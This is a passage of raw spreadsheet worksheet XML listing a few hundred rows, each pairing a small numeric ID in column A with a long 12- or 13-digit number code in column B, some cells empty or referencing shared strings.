        <v>4906</v>
      </c>
      <c r="B3770">
        <v>8120119053301</v>
      </c>
    </row>
    <row r="3771" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3771">
        <v>4907</v>
      </c>
      <c r="B3771">
        <v>8120212202307</v>
      </c>
    </row>
    <row r="3772" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3772">
        <v>4908</v>
      </c>
      <c r="B3772">
        <v>9120003511436</v>
      </c>
    </row>
    <row r="3773" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3773">
        <v>1235</v>
      </c>
      <c r="B3773">
        <v>8120110232884</v>
      </c>
    </row>
    <row r="3774" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3774">
        <v>4909</v>
      </c>
      <c r="B3774">
        <v>8120104922208</v>
      </c>
    </row>
    <row r="3775" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3775">
        <v>4910</v>
      </c>
      <c r="B3775">
        <v>9120018101595</v>
      </c>
    </row>
    <row r="3776" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3776">
        <v>4911</v>
      </c>
      <c r="B3776">
        <v>9120002201528</v>
      </c>
    </row>
    <row r="3777" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3777">
        <v>1663</v>
      </c>
      <c r="B3777">
        <v>8120213051393</v>
      </c>
    </row>
    <row r="3778" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3778">
        <v>4912</v>
      </c>
      <c r="B3778">
        <v>220103581559</v>
      </c>
    </row>
    <row r="3779" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3779">
        <v>4913</v>
      </c>
      <c r="B3779">
        <v>9120104191749</v>
      </c>
    </row>
    <row r="3780" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3780">
        <v>4914</v>
      </c>
      <c r="B3780">
        <v>220003790696</v>
      </c>
    </row>
    <row r="3781" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3781">
        <v>4915</v>
      </c>
      <c r="B3781">
        <v>8120000791661</v>
      </c>
    </row>
    <row r="3782" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3782">
        <v>4916</v>
      </c>
      <c r="B3782">
        <v>8120111052863</v>
      </c>
    </row>
    <row r="3783" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3783">
        <v>4917</v>
      </c>
      <c r="B3783">
        <v>8120015251709</v>
      </c>
    </row>
    <row r="3784" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3784">
        <v>1296</v>
      </c>
      <c r="B3784">
        <v>8120015251709</v>
      </c>
    </row>
    <row r="3785" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3785">
        <v>4918</v>
      </c>
      <c r="B3785">
        <v>9120005682802</v>
      </c>
    </row>
    <row r="3786" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3786">
        <v>4919</v>
      </c>
      <c r="B3786">
        <v>220103581559</v>
      </c>
    </row>
    <row r="3787" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3787">
        <v>4920</v>
      </c>
      <c r="B3787">
        <v>220101740925</v>
      </c>
    </row>
    <row r="3788" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3788">
        <v>4921</v>
      </c>
      <c r="B3788">
        <v>8120110232884</v>
      </c>
    </row>
    <row r="3789" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3789">
        <v>1102</v>
      </c>
      <c r="B3789">
        <v>8120215100063</v>
      </c>
    </row>
    <row r="3790" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3790">
        <v>4922</v>
      </c>
      <c r="B3790">
        <v>220002830587</v>
      </c>
    </row>
    <row r="3791" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3791">
        <v>4923</v>
      </c>
      <c r="B3791">
        <v>220301890463</v>
      </c>
    </row>
    <row r="3792" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3792">
        <v>4924</v>
      </c>
      <c r="B3792">
        <v>220108850846</v>
      </c>
    </row>
    <row r="3793" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3793">
        <v>4925</v>
      </c>
      <c r="B3793">
        <v>9120210040477</v>
      </c>
    </row>
    <row r="3794" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3794">
        <v>4926</v>
      </c>
      <c r="B3794">
        <v>9120007101929</v>
      </c>
    </row>
    <row r="3795" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3795">
        <v>4927</v>
      </c>
      <c r="B3795">
        <v>8120110232884</v>
      </c>
    </row>
    <row r="3796" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3796">
        <v>4928</v>
      </c>
      <c r="B3796">
        <v>220305801117</v>
      </c>
    </row>
    <row r="3797" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3797">
        <v>4929</v>
      </c>
      <c r="B3797">
        <v>8120200872086</v>
      </c>
    </row>
    <row r="3798" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3798">
        <v>4930</v>
      </c>
      <c r="B3798">
        <v>9120017240543</v>
      </c>
    </row>
    <row r="3799" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3799">
        <v>1051</v>
      </c>
      <c r="B3799">
        <v>220109810077</v>
      </c>
    </row>
    <row r="3800" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3800">
        <v>1052</v>
      </c>
      <c r="B3800">
        <v>9120306890989</v>
      </c>
    </row>
    <row r="3801" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3801">
        <v>713</v>
      </c>
      <c r="B3801" t="s">
        <v>16051</v>
      </c>
    </row>
    <row r="3802" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3802">
        <v>1123</v>
      </c>
      <c r="B3802">
        <v>8120200702561</v>
      </c>
    </row>
    <row r="3803" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3803">
        <v>4931</v>
      </c>
      <c r="B3803">
        <v>220104840345</v>
      </c>
    </row>
    <row r="3804" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3804">
        <v>4932</v>
      </c>
      <c r="B3804">
        <v>8120200872086</v>
      </c>
    </row>
    <row r="3805" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3805">
        <v>4933</v>
      </c>
      <c r="B3805">
        <v>9120018101595</v>
      </c>
    </row>
    <row r="3806" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3806">
        <v>4934</v>
      </c>
      <c r="B3806">
        <v>220204672632</v>
      </c>
    </row>
    <row r="3807" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3807">
        <v>4935</v>
      </c>
      <c r="B3807">
        <v>220003491064</v>
      </c>
    </row>
    <row r="3808" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3808">
        <v>331</v>
      </c>
      <c r="B3808">
        <v>8120002821971</v>
      </c>
    </row>
    <row r="3809" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3809">
        <v>4936</v>
      </c>
      <c r="B3809">
        <v>8120000842689</v>
      </c>
    </row>
    <row r="3810" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3810">
        <v>4937</v>
      </c>
      <c r="B3810">
        <v>9120308771201</v>
      </c>
    </row>
    <row r="3811" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3811">
        <v>4938</v>
      </c>
      <c r="B3811">
        <v>9120017021652</v>
      </c>
    </row>
    <row r="3812" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3812">
        <v>907</v>
      </c>
      <c r="B3812">
        <v>9120308771201</v>
      </c>
    </row>
    <row r="3813" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3813">
        <v>901</v>
      </c>
      <c r="B3813">
        <v>9120206132793</v>
      </c>
    </row>
    <row r="3814" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3814">
        <v>4939</v>
      </c>
      <c r="B3814">
        <v>220107802219</v>
      </c>
    </row>
    <row r="3815" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3815">
        <v>4940</v>
      </c>
      <c r="B3815">
        <v>220107802219</v>
      </c>
    </row>
    <row r="3816" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3816">
        <v>4941</v>
      </c>
      <c r="B3816">
        <v>9120204960745</v>
      </c>
    </row>
    <row r="3817" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3817">
        <v>4942</v>
      </c>
      <c r="B3817">
        <v>8120007950856</v>
      </c>
    </row>
    <row r="3818" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3818">
        <v>4943</v>
      </c>
      <c r="B3818">
        <v>8120117012268</v>
      </c>
    </row>
    <row r="3819" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3819">
        <v>480</v>
      </c>
    </row>
    <row r="3820" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3820">
        <v>4944</v>
      </c>
      <c r="B3820">
        <v>220002790515</v>
      </c>
    </row>
    <row r="3821" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3821">
        <v>4945</v>
      </c>
      <c r="B3821">
        <v>8120108912202</v>
      </c>
    </row>
    <row r="3822" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3822">
        <v>4946</v>
      </c>
      <c r="B3822">
        <v>9120208933005</v>
      </c>
    </row>
    <row r="3823" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3823">
        <v>4947</v>
      </c>
      <c r="B3823">
        <v>9120106181842</v>
      </c>
    </row>
    <row r="3824" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3824">
        <v>4948</v>
      </c>
      <c r="B3824">
        <v>299011092113</v>
      </c>
    </row>
    <row r="3825" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3825">
        <v>4949</v>
      </c>
      <c r="B3825">
        <v>9120404261344</v>
      </c>
    </row>
    <row r="3826" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3826">
        <v>905</v>
      </c>
      <c r="B3826">
        <v>8120117012268</v>
      </c>
    </row>
    <row r="3827" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3827">
        <v>4950</v>
      </c>
      <c r="B3827">
        <v>9120304272382</v>
      </c>
    </row>
    <row r="3828" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3828">
        <v>4951</v>
      </c>
      <c r="B3828">
        <v>9120008702965</v>
      </c>
    </row>
    <row r="3829" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3829">
        <v>4952</v>
      </c>
      <c r="B3829">
        <v>220107732517</v>
      </c>
    </row>
    <row r="3830" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3830">
        <v>4953</v>
      </c>
      <c r="B3830">
        <v>220009702739</v>
      </c>
    </row>
    <row r="3831" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3831">
        <v>4954</v>
      </c>
      <c r="B3831">
        <v>9120017021088</v>
      </c>
    </row>
    <row r="3832" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3832">
        <v>4955</v>
      </c>
      <c r="B3832">
        <v>8120201980043</v>
      </c>
    </row>
    <row r="3833" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3833">
        <v>1012</v>
      </c>
    </row>
    <row r="3834" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3834">
        <v>4956</v>
      </c>
      <c r="B3834">
        <v>220006472189</v>
      </c>
    </row>
    <row r="3835" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3835">
        <v>4957</v>
      </c>
      <c r="B3835">
        <v>220100791739</v>
      </c>
    </row>
    <row r="3836" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3836">
        <v>292</v>
      </c>
      <c r="B3836">
        <v>8120003890563</v>
      </c>
    </row>
    <row r="3837" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3837">
        <v>4958</v>
      </c>
      <c r="B3837">
        <v>9120302490768</v>
      </c>
    </row>
    <row r="3838" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3838">
        <v>4959</v>
      </c>
      <c r="B3838">
        <v>9120209351033</v>
      </c>
    </row>
    <row r="3839" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3839">
        <v>4960</v>
      </c>
      <c r="B3839">
        <v>9120304931505</v>
      </c>
    </row>
    <row r="3840" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3840">
        <v>4961</v>
      </c>
      <c r="B3840">
        <v>220106601599</v>
      </c>
    </row>
    <row r="3841" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3841">
        <v>4963</v>
      </c>
      <c r="B3841">
        <v>220203890543</v>
      </c>
    </row>
    <row r="3842" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3842">
        <v>724</v>
      </c>
      <c r="B3842">
        <v>9120203381344</v>
      </c>
    </row>
    <row r="3843" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3843">
        <v>4964</v>
      </c>
      <c r="B3843">
        <v>8120311042039</v>
      </c>
    </row>
    <row r="3844" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3844">
        <v>4965</v>
      </c>
      <c r="B3844">
        <v>220009512378</v>
      </c>
    </row>
    <row r="3845" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3845">
        <v>4966</v>
      </c>
      <c r="B3845">
        <v>9120100801594</v>
      </c>
    </row>
    <row r="3846" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3846">
        <v>4967</v>
      </c>
      <c r="B3846">
        <v>220002692044</v>
      </c>
    </row>
    <row r="3847" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3847">
        <v>4968</v>
      </c>
      <c r="B3847">
        <v>9120404750529</v>
      </c>
    </row>
    <row r="3848" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3848">
        <v>29</v>
      </c>
      <c r="B3848">
        <v>912031121557</v>
      </c>
    </row>
    <row r="3849" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3849">
        <v>4969</v>
      </c>
      <c r="B3849">
        <v>220305132507</v>
      </c>
    </row>
    <row r="3850" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3850">
        <v>916</v>
      </c>
      <c r="B3850">
        <v>9120011060059</v>
      </c>
    </row>
    <row r="3851" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3851">
        <v>4970</v>
      </c>
      <c r="B3851">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3852" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3852">
        <v>4971</v>
      </c>
      <c r="B3852">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3853" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3853">
        <v>4972</v>
      </c>
      <c r="B3853">
        <v>220406822093</v>
      </c>
    </row>
    <row r="3854" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3854">
        <v>4973</v>
      </c>
      <c r="B3854">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3855" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3855">
        <v>4974</v>
      </c>
      <c r="B3855">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3856" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3856">
        <v>4975</v>
      </c>
      <c r="B3856">
        <v>220201182724</v>
      </c>
    </row>
    <row r="3857" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3857">
        <v>4976</v>
      </c>
      <c r="B3857">
        <v>9120204731886</v>
      </c>
    </row>
    <row r="3858" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3858">
        <v>321</v>
      </c>
      <c r="B3858">
        <v>8120210002834</v>
      </c>
    </row>
    <row r="3859" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3859">
        <v>4977</v>
      </c>
      <c r="B3859">
        <v>8120007872185</v>
      </c>
    </row>
    <row r="3860" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3860">
        <v>1107</v>
      </c>
      <c r="B3860">
        <v>8120103950469</v>
      </c>
    </row>
    <row r="3861" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3861">
        <v>4978</v>
      </c>
      <c r="B3861">
        <v>8120011181279</v>
      </c>
    </row>
    <row r="3862" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3862">
        <v>4979</v>
      </c>
      <c r="B3862">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3863" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3863">
        <v>4980</v>
      </c>
      <c r="B3863">
        <v>8120006980263</v>
      </c>
    </row>
    <row r="3864" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3864">
        <v>4981</v>
      </c>
      <c r="B3864">
        <v>8120006980263</v>
      </c>
    </row>
    <row r="3865" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3865">
        <v>4982</v>
      </c>
      <c r="B3865">
        <v>220303391821</v>
      </c>
    </row>
    <row r="3866" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3866">
        <v>4983</v>
      </c>
      <c r="B3866">
        <v>220205671485</v>
      </c>
    </row>
    <row r="3867" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3867">
        <v>4984</v>
      </c>
      <c r="B3867">
        <v>8120312051279</v>
      </c>
    </row>
    <row r="3868" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3868">
        <v>4985</v>
      </c>
      <c r="B3868">
        <v>8120312051279</v>
      </c>
    </row>
    <row r="3869" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3869">
        <v>4986</v>
      </c>
      <c r="B3869">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3870" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3870">
        <v>4987</v>
      </c>
      <c r="B3870">
        <v>220001801435</v>
      </c>
    </row>
    <row r="3871" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3871">
        <v>4988</v>
      </c>
      <c r="B3871">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3872" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3872">
        <v>4989</v>
      </c>
      <c r="B3872">
        <v>9120304272382</v>
      </c>
    </row>
    <row r="3873" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3873">
        <v>555</v>
      </c>
      <c r="B3873">
        <v>8120103882431</v>
      </c>
    </row>
    <row r="3874" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3874">
        <v>4990</v>
      </c>
      <c r="B3874" t="s">
        <v>16065</v>
      </c>
    </row>
    <row r="3875" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3875">
        <v>4991</v>
      </c>
      <c r="B3875">
        <v>225000991916</v>
      </c>
    </row>
    <row r="3876" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3876">
        <v>965</v>
      </c>
      <c r="B3876">
        <v>220003611313</v>
      </c>
    </row>
    <row r="3877" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3877">
        <v>506</v>
      </c>
    </row>
    <row r="3878" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3878">
        <v>4992</v>
      </c>
      <c r="B3878">
        <v>220001801435</v>
      </c>
    </row>
    <row r="3879" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3879">
        <v>4993</v>
      </c>
      <c r="B3879">
        <v>9120304272382</v>
      </c>
    </row>
    <row r="3880" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3880">
        <v>0</v>
      </c>
    </row>
    <row r="3881" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3881">
        <v>0</v>
      </c>
      <c r="B3881">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3882" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3882">
        <v>0</v>
      </c>
      <c r="B3882">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3883" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3883">
        <v>0</v>
      </c>
    </row>
    <row r="3884" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3884">
        <v>0</v>
      </c>
      <c r="B3884">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3885" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3885">
        <v>0</v>
      </c>
      <c r="B3885">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3886" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3886">
        <v>0</v>
      </c>
      <c r="B3886">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3887" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3887">
        <v>0</v>
      </c>
      <c r="B3887">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3888" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3888">
        <v>0</v>
      </c>
    </row>
    <row r="3889" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3889">
        <v>0</v>
      </c>
    </row>
    <row r="3890" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3890">
        <v>0</v>
      </c>
      <c r="B3890">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3891" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3891">
        <v>0</v>
      </c>
      <c r="B3891">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3892" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3892">
        <v>0</v>
      </c>
    </row>
    <row r="3893" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3893">
        <v>1216</v>
      </c>
      <c r="B3893">
        <v>8120105702565</v>
      </c>
    </row>
    <row r="3894" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3894">
        <v>954</v>
      </c>
      <c r="B3894">
        <v>9120200141153</v>
      </c>
    </row>
    <row r="3895" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3895">
        <v>0</v>
      </c>
      <c r="B3895">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3896" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3896">
        <v>0</v>
      </c>
      <c r="B3896">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3897" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3897">
        <v>0</v>
      </c>
      <c r="B3897">
        <v>220703970413</v>
      </c>
    </row>
    <row r="3898" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3898">
        <v>4994</v>
      </c>
      <c r="B3898">
        <v>9120205352493</v>
      </c>
    </row>
    <row r="3899" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3899">
        <v>4995</v>
      </c>
      <c r="B3899">
        <v>9120304272382</v>
      </c>
    </row>
    <row r="3900" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3900">
        <v>4996</v>
      </c>
      <c r="B3900">
        <v>9120304272382</v>
      </c>
    </row>
    <row r="3901" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3901">
        <v>4997</v>
      </c>
      <c r="B3901">
        <v>9120017091292</v>
      </c>
    </row>
    <row r="3902" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3902">
        <v>4998</v>
      </c>
      <c r="B3902">
        <v>8120107991289</v>
      </c>
    </row>
    <row r="3903" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3903">
        <v>4999</v>
      </c>
      <c r="B3903">
        <v>8120212270961</v>
      </c>
    </row>
    <row r="3904" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3904">
        <v>5000</v>
      </c>
      <c r="B3904">
        <v>8120001802818</v>
      </c>
    </row>
    <row r="3905" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3905">
        <v>755</v>
      </c>
    </row>
    <row r="3906" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3906">
        <v>1003</v>
      </c>
      <c r="B3906">
        <v>8120211193207</v>
      </c>
    </row>
    <row r="3907" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3907">
        <v>5001</v>
      </c>
      <c r="B3907">
        <v>9120214142453</v>
      </c>
    </row>
    <row r="3908" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3908">
        <v>5002</v>
      </c>
      <c r="B3908">
        <v>220006490876</v>
      </c>
    </row>
    <row r="3909" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3909">
        <v>974</v>
      </c>
      <c r="B3909">
        <v>9120001222354</v>
      </c>
    </row>
    <row r="3910" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3910">
        <v>5003</v>
      </c>
      <c r="B3910">
        <v>220200691177</v>
      </c>
    </row>
    <row r="3911" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3911">
        <v>761</v>
      </c>
      <c r="B3911">
        <v>8120203840613</v>
      </c>
    </row>
    <row r="3912" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3912">
        <v>5004</v>
      </c>
      <c r="B3912">
        <v>8120001721627</v>
      </c>
    </row>
    <row r="3913" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3913">
        <v>1182</v>
      </c>
      <c r="B3913">
        <v>8120006930063</v>
      </c>
    </row>
    <row r="3914" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3914">
        <v>5005</v>
      </c>
      <c r="B3914">
        <v>220109241806</v>
      </c>
    </row>
    <row r="3915" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3915">
        <v>5006</v>
      </c>
      <c r="B3915">
        <v>9120504920259</v>
      </c>
    </row>
    <row r="3916" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3916">
        <v>5007</v>
      </c>
      <c r="B3916">
        <v>9120006971681</v>
      </c>
    </row>
    <row r="3917" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3917">
        <v>5008</v>
      </c>
      <c r="B3917">
        <v>220205291731</v>
      </c>
    </row>
    <row r="3918" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3918">
        <v>5009</v>
      </c>
      <c r="B3918">
        <v>220205291731</v>
      </c>
    </row>
    <row r="3919" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3919">
        <v>5010</v>
      </c>
      <c r="B3919">
        <v>9120214142453</v>
      </c>
    </row>
    <row r="3920" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3920">
        <v>5011</v>
      </c>
      <c r="B3920">
        <v>8120117050983</v>
      </c>
    </row>
    <row r="3921" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3921">
        <v>5012</v>
      </c>
      <c r="B3921">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3922" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3922">
        <v>5013</v>
      </c>
      <c r="B3922">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3923" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3923">
        <v>5014</v>
      </c>
      <c r="B3923" t="s">
        <v>16072</v>
      </c>
    </row>
    <row r="3924" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3924">
        <v>5015</v>
      </c>
      <c r="B3924">
        <v>220302350791</v>
      </c>
    </row>
    <row r="3925" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3925">
        <v>1069</v>
      </c>
      <c r="B3925">
        <v>8120000910139</v>
      </c>
    </row>
    <row r="3926" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3926">
        <v>1165</v>
      </c>
      <c r="B3926">
        <v>8120009802176</v>
      </c>
    </row>
    <row r="3927" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3927">
        <v>5016</v>
      </c>
      <c r="B3927">
        <v>9120508753203</v>
      </c>
    </row>
    <row r="3928" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3928">
        <v>5017</v>
      </c>
      <c r="B3928">
        <v>223000911882</v>
      </c>
    </row>
    <row r="3929" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3929">
        <v>1067</v>
      </c>
    </row>
    <row r="3930" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3930">
        <v>5018</v>
      </c>
      <c r="B3930">
        <v>220205291731</v>
      </c>
    </row>
    <row r="3931" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3931">
        <v>0</v>
      </c>
    </row>
    <row r="3932" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3932">
        <v>0</v>
      </c>
    </row>
    <row r="3933" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3933">
        <v>0</v>
      </c>
    </row>
    <row r="3934" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3934">
        <v>0</v>
      </c>
      <c r="B3934">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3935" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3935">
        <v>0</v>
      </c>
    </row>
    <row r="3936" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3936">
        <v>0</v>
      </c>
    </row>
    <row r="3937" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3937">
        <v>0</v>
      </c>
      <c r="B3937">
        <v>8120005782554</v>
      </c>
    </row>
    <row r="3938" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3938">
        <v>0</v>
      </c>
    </row>
    <row r="3939" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3939">
        <v>0</v>
      </c>
    </row>
    <row r="3940" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3940">
        <v>0</v>
      </c>
    </row>
    <row r="3941" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3941">
        <v>0</v>
      </c>
    </row>
    <row r="3942" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3942">
        <v>5019</v>
      </c>
      <c r="B3942">
        <v>8120014151382</v>
      </c>
    </row>
    <row r="3943" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3943">
        <v>1300</v>
      </c>
      <c r="B3943">
        <v>8120001752609</v>
      </c>
    </row>
    <row r="3944" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3944">
        <v>5020</v>
      </c>
      <c r="B3944">
        <v>8120110232884</v>
      </c>
    </row>
    <row r="3945" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A3945">
        <v>1083</v>
      </c>
      <c r="B3945">
        <v>9120107651597</v>
      </c>
    </row>
